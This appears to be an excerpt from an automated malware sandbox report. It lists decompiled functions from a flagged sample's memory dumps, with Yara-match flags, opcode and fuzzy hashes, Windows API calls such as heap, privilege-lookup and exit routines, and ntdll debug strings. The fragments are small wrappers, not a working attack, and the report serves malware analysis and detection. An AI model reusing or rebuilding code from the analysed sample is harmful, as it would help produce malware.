                                                                                                                          Function 00A49780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 4cc1a055ef5ad7ffbb4182ab6a3324b9cdb2ae385965ac26bc009718ca027027
                                                                                                                          • Instruction ID: f455264d3e230fdaa5da93997a6747d008b443e26f4d11623bc6616487098b57
                                                                                                                          • Opcode Fuzzy Hash: 4cc1a055ef5ad7ffbb4182ab6a3324b9cdb2ae385965ac26bc009718ca027027
                                                                                                                          • Instruction Fuzzy Hash: 2890026921300003D2917169540860A0005E7D1343F91D425A4005558CC96588ADA361
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 97061f5890ea04ace6c2b4ecc42d50a00c9cc56b1110d23329624cd140ae34d0
                                                                                                                          • Instruction ID: 5648b87f03e205912434b748b2a8678bc994c3f78523e6e99c13484dcec24f85
                                                                                                                          • Opcode Fuzzy Hash: 97061f5890ea04ace6c2b4ecc42d50a00c9cc56b1110d23329624cd140ae34d0
                                                                                                                          • Instruction Fuzzy Hash: A190027131114403D221616984047060005E7D1342F51C421A4814558D86E588D5B162
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 9ee7eadea693d9cebcf30fbf16ecfb24366f1ee7395257516ad07c91ad2ecad4
                                                                                                                          • Instruction ID: ce6b1a714e862e6b33b3a65d62e18ad929d5c69ff1b880c89aa1bdfe96938745
                                                                                                                          • Opcode Fuzzy Hash: 9ee7eadea693d9cebcf30fbf16ecfb24366f1ee7395257516ad07c91ad2ecad4
                                                                                                                          • Instruction Fuzzy Hash: 0F90027120100403D21165A954086460005E7E0342F51D021A9014555EC6B588D5B171
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                          • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                                                                                                                          • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                          • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				L00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                          0x004184b7
                                                                                                                          0x004184c2
                                                                                                                          0x004184cd
                                                                                                                          0x004184d1

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID: &5A
                                                                                                                          • API String ID: 1279760036-1617645808
                                                                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                          • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                                                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                          • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				L00419D30( &_v67, 0, 0x3f);
				E0041A910( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                                          0x00407270
                                                                                                                          0x0040727f
                                                                                                                          0x00407283
                                                                                                                          0x0040728e
                                                                                                                          0x0040729e
                                                                                                                          0x004072ae
                                                                                                                          0x004072b3
                                                                                                                          0x004072ba
                                                                                                                          0x004072bd
                                                                                                                          0x004072ca
                                                                                                                          0x004072cc
                                                                                                                          0x004072ce
                                                                                                                          0x004072eb
                                                                                                                          0x004072eb
                                                                                                                          0x00000000
                                                                                                                          0x004072ed
                                                                                                                          0x004072f2

                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1836367815-0
                                                                                                                          • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                                          • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                                                                                                          • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                                          • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00418675, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 2b22221c3b210471ff1b8bf9103a91c95a37d647fff54dc2bc040ec3afc8e04c
                                                                                                                          • Instruction ID: 9a823f8c78894249dba104d5ea0f087799ce9c1430a6f2244117b3d31d4b0435
                                                                                                                          • Opcode Fuzzy Hash: 2b22221c3b210471ff1b8bf9103a91c95a37d647fff54dc2bc040ec3afc8e04c
                                                                                                                          • Instruction Fuzzy Hash: 4B01ADB22042446FDB24DFA5DC89EEB7B68EF84350F14859DF98D5B282C930E811CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004184D4, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 64%
                                                                                                                          			E004184D4(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				asm("adc bl, [ebp+0x35]");
				asm("out dx, eax");
				_t7 = _a4;
				_t3 = _t7 + 0xc74; // 0xc74
				L00418DD0(0x8bec8b55, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                          0x004184d4
                                                                                                                          0x004184de
                                                                                                                          0x004184e3
                                                                                                                          0x004184ef
                                                                                                                          0x004184f7
                                                                                                                          0x0041850d
                                                                                                                          0x00418511

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: bcc1ec7d6e7d6ac1d184e4638b90497378ca44e04d2126619acfb57251e404be
                                                                                                                          • Instruction ID: ab81e3b6ab6d3b91ce71e5eff0dc86bffa658c17d00b5c940c9f491b72657ba9
                                                                                                                          • Opcode Fuzzy Hash: bcc1ec7d6e7d6ac1d184e4638b90497378ca44e04d2126619acfb57251e404be
                                                                                                                          • Instruction Fuzzy Hash: 24E0D8BC2442851BDB04EE69E4908E73795FF85354714994EEC9987307C534D8568BB1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				L00418DD0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                          0x004184ef
                                                                                                                          0x004184f7
                                                                                                                          0x0041850d
                                                                                                                          0x00418511

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                          • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                          • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				L00418DD0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                          0x0041865a
                                                                                                                          0x00418670
                                                                                                                          0x00418674

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                          • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                                                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                          • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00418512, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: 122aecf94cc41ec917835493dfd9b606af23139f21e44ad84ef64d83a3c9c8b1
                                                                                                                          • Instruction ID: dd81a4506f34eb1dc815d8e525c1c8e650a7b6415f3c6e3ee69276a5238c3cd9
                                                                                                                          • Opcode Fuzzy Hash: 122aecf94cc41ec917835493dfd9b606af23139f21e44ad84ef64d83a3c9c8b1
                                                                                                                          • Instruction Fuzzy Hash: 12E04F31600615BFC324DF65CC85FE33B64AF59790F0545ADF91A9B682C631A601CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00418642, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 95cdc35e99a254c2aded364cd106fd50a8e26a999ed31900c700e6dd24670211
                                                                                                                          • Instruction ID: b01ba6cf3436e3ac7ba59ad1e4c80d6b9cf1e4843ea3370bd1df8a4db748f34e
                                                                                                                          • Opcode Fuzzy Hash: 95cdc35e99a254c2aded364cd106fd50a8e26a999ed31900c700e6dd24670211
                                                                                                                          • Instruction Fuzzy Hash: EDE04FB12002046FDB10DF55DC84EE73769EF88350F018159F90C97281C935E8118BB4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00418520, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00418520(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				L00418DD0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                          0x00418523
                                                                                                                          0x0041853a
                                                                                                                          0x00418548

                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                          • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                                                                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                          • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A4967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                                                                                                                          • Instruction ID: 3611c612406d18cddccccd86054bbce9a335fcd3a835415094ae52f60009255c
                                                                                                                          • Opcode Fuzzy Hash: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                                                                                                                          • Instruction Fuzzy Hash: 40B09B719424C5C6D711D77046087177900B7D0741F17C065D1020641A4778C4D5F5B6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 00ABB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          • The instruction at %p referenced memory at %p., xrefs: 00ABB432
                                                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00ABB3D6
                                                                                                                          • This failed because of error %Ix., xrefs: 00ABB446
                                                                                                                          • The instruction at %p tried to %s , xrefs: 00ABB4B6
                                                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00ABB53F
                                                                                                                          • *** enter .cxr %p for the context, xrefs: 00ABB50D
                                                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00ABB39B
                                                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00ABB314
                                                                                                                          • The resource is owned shared by %d threads, xrefs: 00ABB37E
                                                                                                                          • an invalid address, %p, xrefs: 00ABB4CF
                                                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00ABB305
                                                                                                                          • The critical section is owned by thread %p., xrefs: 00ABB3B9
                                                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 00ABB48F
                                                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00ABB2DC
                                                                                                                          • <unknown>, xrefs: 00ABB27E, 00ABB2D1, 00ABB350, 00ABB399, 00ABB417, 00ABB48E
                                                                                                                          • *** Inpage error in %ws:%s, xrefs: 00ABB418
                                                                                                                          • *** enter .exr %p for the exception record, xrefs: 00ABB4F1
                                                                                                                          • a NULL pointer, xrefs: 00ABB4E0
                                                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 00ABB352
                                                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00ABB38F
                                                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00ABB47D
                                                                                                                          • write to, xrefs: 00ABB4A6
                                                                                                                          • *** then kb to get the faulting stack, xrefs: 00ABB51C
                                                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00ABB476
                                                                                                                          • read from, xrefs: 00ABB4AD, 00ABB4B2
                                                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00ABB484
                                                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00ABB323
                                                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00ABB2F3
                                                                                                                          • Go determine why that thread has not released the critical section., xrefs: 00ABB3C5
                                                                                                                          • The resource is owned exclusively by thread %p, xrefs: 00ABB374
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                          • API String ID: 0-108210295
                                                                                                                          • Opcode ID: 5e013a10fc5044cdff17fb49b96d15ed46d7b095a640a9fa69f9e7510f5dcdfc
                                                                                                                          • Instruction ID: 6b127cae82da00e25bf6b42a229ca08eadab794a747620474e32ad3b1301847d
                                                                                                                          • Opcode Fuzzy Hash: 5e013a10fc5044cdff17fb49b96d15ed46d7b095a640a9fa69f9e7510f5dcdfc
                                                                                                                          • Instruction Fuzzy Hash: AA811235A21204FFCB266B55CC47EBB3B7AEF86B59F010044F2052B5A3D3A18951DBB2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00AC1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 44%
                                                                                                                          			E00AC1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x9e48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A0B150();
				} else {
					E00A0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xaf589c);
				E00A0B150("Heap error detected at %p (heap handle %p)\n",  *0xaf58a0);
				_t27 =  *0xaf5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00AC1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A0B150();
				} else {
					E00A0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00A0B150("Error code: %d - %s\n",  *0xaf5898);
				_t113 =  *0xaf58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A0B150();
					} else {
						E00A0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A0B150("Parameter1: %p\n",  *0xaf58a4);
				}
				_t115 =  *0xaf58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A0B150();
					} else {
						E00A0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A0B150("Parameter2: %p\n",  *0xaf58a8);
				}
				_t117 =  *0xaf58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A0B150();
					} else {
						E00A0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A0B150("Parameter3: %p\n",  *0xaf58ac);
				}
				_t119 =  *0xaf58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A0B150();
					} else {
						E00A0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xaf58b4);
					E00A0B150("Last known valid blocks: before - %p, after - %p\n",  *0xaf58b0);
				} else {
					_t120 =  *0xaf58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A0B150();
				} else {
					E00A0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00A0B150("Stack trace available at %p\n", 0xaf58c0);
			}











                                                                                                                          0x00ac1c10
                                                                                                                          0x00ac1c16
                                                                                                                          0x00ac1c1e
                                                                                                                          0x00ac1c3d
                                                                                                                          0x00ac1c3e
                                                                                                                          0x00ac1c20
                                                                                                                          0x00ac1c35
                                                                                                                          0x00ac1c3a
                                                                                                                          0x00ac1c44
                                                                                                                          0x00ac1c55
                                                                                                                          0x00ac1c5a
                                                                                                                          0x00ac1c65
                                                                                                                          0x00ac1c67
                                                                                                                          0x00000000
                                                                                                                          0x00ac1c6e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
